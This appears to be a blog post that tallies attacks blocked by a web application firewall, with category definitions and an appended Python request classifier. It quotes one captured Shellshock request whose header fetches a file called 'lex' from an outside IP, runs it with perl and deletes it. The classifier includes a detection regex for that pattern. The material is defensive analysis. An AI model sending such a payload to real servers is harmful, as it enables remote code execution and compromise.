Attack of the Day

Statistics.

Break out your textbooks, kids. Today we’re going to talk about statistics. Well, more like “counting with graphs”, but whatever.

A couple of points on the data presented below. First, it is very common to see a single request violate several rules. Take this request, for instance.

GET /cgi-bin/bts.cgi HTTP/1.0
Host: 69.44.4.28
User-Agent: () { :;}; /bin/bash -c "cd /tmp;wget http://100.42.30.34/lex ; curl -O http://100.42.30.34/lex ; perl lex ;rm -rf lex"
Connection: Keep-Alive
X-Forwarded-For: 72.9.231.226
X_FORWARDED_PROTO: https

There’s so much wrong with this, I’m not sure where to start. Signature violations, use of an illegal file type (for my policy), violations of the HTTP protocol. There were 9 different signature violations in this one request. To be fair, this request has more wrong with it than most. Typically, the violations I see land in two or three buckets. I only point this out to put some context around the numbers posted below.

The second thing I’ll point out is that I have a few different policies that protect sites other than www.planetspork.com. They are small, crappy sites just like this one. I host them for free and I get to see the requests. It’s a fair trade.

The final point is that each number in the data below could represent an alert (warning) or a block. Why is that? Some things I take a pretty hard line about (no SQL injection). Other things only trigger a warning (the request is from a known bad IP address). As far as these graphs are concerned, they are both the same.

With that, I present to you the data. This isn’t quite 30 days of attacks, but it’s what I have available since the project started. There are some category descriptions at the bottom of the page, if you’re curious.  Enjoy.

| Attack Type | Requests |
| --- | ---: |
| HTTP Parser Attack | 748 |
| Abuse of Functionality | 403 |
| Detection Evasion | 216 |
| Command Execution | 185 |
| Injection Attempt | 178 |
| Non-browser Client | 134 |
| Predictable Resource Location | 118 |
| Information Leakage | 61 |
| Buffer Overflow | 57 |
| Forceful Browsing | 56 |
| Total attack count for all requests | 2267 |

Categories

HTTP Parser Attack – This is the “stupid hacker” category. HTTP headers without any values, Host headers with IP addresses instead of host names, HTTP/1.1 requests without Host headers and the like land here.

Abuse of Functionality – When a request uses a website’s own functionality against it, we land here.  File upload pages and trackbacks are good places to find these attacks.

Detection Evasion – This bucket increments when the attacker needlessly encodes data or uses path traversal to trick the host into executing something it shouldn’t.

Command Execution – Requests that contain extra information in an attempt to get the web server to run a command it probably shouldn’t. Shellshock requests go here.

Injection Attempt – This category increments when those crazy hackers drop SQL statements right into my unvalidated input fields.

Predictable Resource Location – Just what it sounds like. Default locations for login pages, example pages that might reveal information, those kinds of things.

Information Leakage – Got info heading away from your site that maybe shouldn’t be?  That shows up here.  It doesn’t require an adult diaper, which is what I initially thought this meant.  🙂

Non-Browser Client – You know, the wget/curl/xyz-spider type requests. Not necessarily bad, but tracked nonetheless.

Forceful Browsing – Incremented when a request doesn’t respect the rules of an application.  For instance, if a request to wp-admin.php is made before a visit to wp-login.php has happened.
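As an added example (not code from this post or from the author’s WAF), here is a small Python classifier that applies a few of the bucket definitions above (HTTP Parser Attack, Command Execution, Non-browser Client, Predictable Resource Location) to constructed raw requests and tallies them the way the table does, so a single request landing in several buckets, as discussed at the top of the page, shows up directly. The default-path list, the `Mozilla/` heuristic, the regexes and the sample requests are all assumptions made for the example.

```python
import re
from collections import Counter

# Constructed sample requests (not from the post's logs); the first mimics
# the Shellshock-style request above, using documentation addresses.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/bts.cgi HTTP/1.0\r\nHost: 192.0.2.10\r\n"
    'User-Agent: () { :;}; /bin/bash -c "echo test"\r\nConnection: Keep-Alive\r\n',
    "GET /wp-login.php HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n",
    "GET /index.php HTTP/1.1\r\nUser-Agent: Wget/1.19\r\nAccept:\r\n",
]

DEFAULT_PATHS = {"/wp-login.php", "/phpmyadmin/", "/admin/"}  # assumed, tiny list
IP_LITERAL = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")  # Host that is a bare IP
SHELLSHOCK = re.compile(r"\(\)\s*\{")  # the "() {" Shellshock marker

def parse_request(raw):
    """Split a raw request into (method, path, version, [(name, value), ...])."""
    lines = raw.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers.append((name.strip().lower(), value.strip()))
    return method, path, version, headers

def classify(raw):
    """Return the set of buckets one request lands in (often more than one)."""
    _, path, version, headers = parse_request(raw)
    hdr = dict(headers)
    host = hdr.get("host")
    hits = set()
    if (any(v == "" for _, v in headers) or (version == "HTTP/1.1" and host is None)
            or (host is not None and IP_LITERAL.match(host))):
        hits.add("HTTP Parser Attack")
    if SHELLSHOCK.search(path) or any(SHELLSHOCK.search(v) for _, v in headers):
        hits.add("Command Execution")
    if not hdr.get("user-agent", "").startswith("Mozilla/"):  # crude heuristic
        hits.add("Non-browser Client")
    if path in DEFAULT_PATHS:
        hits.add("Predictable Resource Location")
    return hits

def tally(requests):
    """Per-bucket request counts, as in the table above; one request may count in several."""
    return Counter(cat for raw in requests for cat in classify(raw))
```

Running `tally(SAMPLE_REQUESTS)` gives six bucket hits from three requests, which is exactly why the table's per-category counts do not add up to the number of requests seen.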